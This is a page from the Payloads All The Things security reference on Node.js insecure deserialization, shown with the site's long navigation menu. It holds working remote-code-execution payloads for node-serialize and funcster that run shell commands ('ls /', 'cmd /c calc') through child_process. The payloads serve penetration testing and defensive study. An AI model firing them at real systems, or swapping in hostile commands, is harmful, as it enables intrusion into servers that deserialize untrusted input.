Skip to content

Payloads All The Things

Node Deserialization

Payloads All The Things

Payloads All The Things
CONTRIBUTING
API Key Leaks
API Key Leaks
- API Key Leaks
AWS Amazon Bucket S3
AWS Amazon Bucket S3
- Amazon Bucket S3 AWS
Account Takeover
Account Takeover
- Account Takeover
Argument Injection
Argument Injection
- Argument Injection
Business Logic Errors
Business Logic Errors
- Business Logic Errors
CICD
CICD
- CI/CD attacks
CORS Misconfiguration
CORS Misconfiguration
- CORS Misconfiguration
CRLF Injection
CRLF Injection
- Carriage Return Line Feed
CSRF Injection
CSRF Injection
- Cross-Site Request Forgery
CSV Injection
CSV Injection
- CSV Injection
CVE Exploits
CVE Exploits
- Common Vulnerabilities and Exposures
- CVE-2021-44228 Log4Shell
Clickjacking
Clickjacking
- Clickjacking: Web Application Security Vulnerability
Command Injection
Command Injection
- Command Injection
DNS Rebinding
DNS Rebinding
- DNS Rebinding
Dependency Confusion
Dependency Confusion
- Dependency Confusion
Directory Traversal
Directory Traversal
- Directory Traversal
Dom Clobbering
Dom Clobbering
- Dom Clobbering
File Inclusion
File Inclusion
- File Inclusion
Google Web Toolkit
Google Web Toolkit
- Google Web Toolkit
GraphQL Injection
GraphQL Injection
- GraphQL Injection
HTTP Parameter Pollution
HTTP Parameter Pollution
- HTTP Parameter Pollution
Hidden Parameters
Hidden Parameters
- HTTP Hidden Parameters
Insecure Deserialization
Insecure Deserialization
- Insecure Deserialization
- .NET Serialization
- Java Deserialization
- Node Deserialization Node Deserialization
  Table of contents
- PHP Deserialization
- Python Deserialization
- Ruby Deserialization
- YAML Deserialization
Insecure Direct Object References
Insecure Direct Object References
- Insecure Direct Object References
Insecure Management Interface
Insecure Management Interface
- Insecure Management Interface
Insecure Randomness
Insecure Randomness
- Insecure Randomness
Insecure Source Code Management
Insecure Source Code Management
- Insecure Source Code Management
JSON Web Token
JSON Web Token
- JWT - JSON Web Token
Java RMI
Java RMI
- Java RMI
Kubernetes
Kubernetes
- Kubernetes
LDAP Injection
LDAP Injection
- LDAP Injection
LaTeX Injection
LaTeX Injection
- LaTex Injection
Mass Assignment
Mass Assignment
- Mass Assignment
Methodology and Resources
Methodology and Resources
NoSQL Injection
NoSQL Injection
- NoSQL Injection
OAuth Misconfiguration
OAuth Misconfiguration
- OAuth Misconfiguration
Open Redirect
Open Redirect
- Open URL Redirection
Prompt Injection
Prompt Injection
- Prompt Injection
Prototype Pollution
Prototype Pollution
- Prototype Pollution
Race Condition
Race Condition
- Race Condition
Regular Expression
Regular Expression
- Regular Expression
Request Smuggling
Request Smuggling
- Request Smuggling
SAML Injection
SAML Injection
- SAML Injection
SQL Injection
SQL Injection
Server Side Include Injection
Server Side Include Injection
- Server Side Include Injection
Server Side Request Forgery
Server Side Request Forgery
- Server-Side Request Forgery
Server Side Template Injection
Server Side Template Injection
- Server Side Template Injection
Tabnabbing
Tabnabbing
- Tabnabbing
Type Juggling
Type Juggling
- Type Juggling
Upload Insecure Files
Upload Insecure Files
- Upload Insecure Files
- CVE Ffmpeg HLS
  CVE Ffmpeg HLS
  - FFmpeg HLS vulnerability
- Configuration Apache .htaccess
  Configuration Apache .htaccess
  - .htaccess upload
- Configuration Busybox httpd.conf
  Configuration Busybox httpd.conf
  - Index
- Configuration uwsgi.ini
  Configuration uwsgi.ini
  - uWSGI configuration file
- Extension Flash
  Extension Flash
  - Index
- Extension PDF JS
  Extension PDF JS
  - Generate PDF File Containing JavaScript Code
- Picture ImageMagick
  Picture ImageMagick
  - ImageMagick Exploits
- Zip Slip
  Zip Slip
  - Zip Slip
Web Cache Deception
Web Cache Deception
- Web Cache Deception
Web Sockets
Web Sockets
- Web Sockets
XPATH Injection
XPATH Injection
- XPATH Injection
XSLT Injection
XSLT Injection
- XSLT Injection
XSS Injection
XSS Injection
XXE Injection
XXE Injection
- XML External Entity
LEARNING AND SOCIALS
LEARNING AND SOCIALS
- Books
- Twitter
- Youtube
template vuln
template vuln
- Vulnerability Title

Node Deserialization

Summary

Exploit
- node-serialize
- funcster
References

Exploit

In Node source code, look for:
- node-serialize
- serialize-to-js
- funcster

node-serialize

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the unserialize() function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).

Generate a serialized payload

var y = {
    rce : function(){
        require('child_process').exec('ls /', function(error,
        stdout, stderr) { console.log(stdout) });
    },
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));

Add bracket () to force the execution

{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}

Send the payload

funcster

{"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}}

References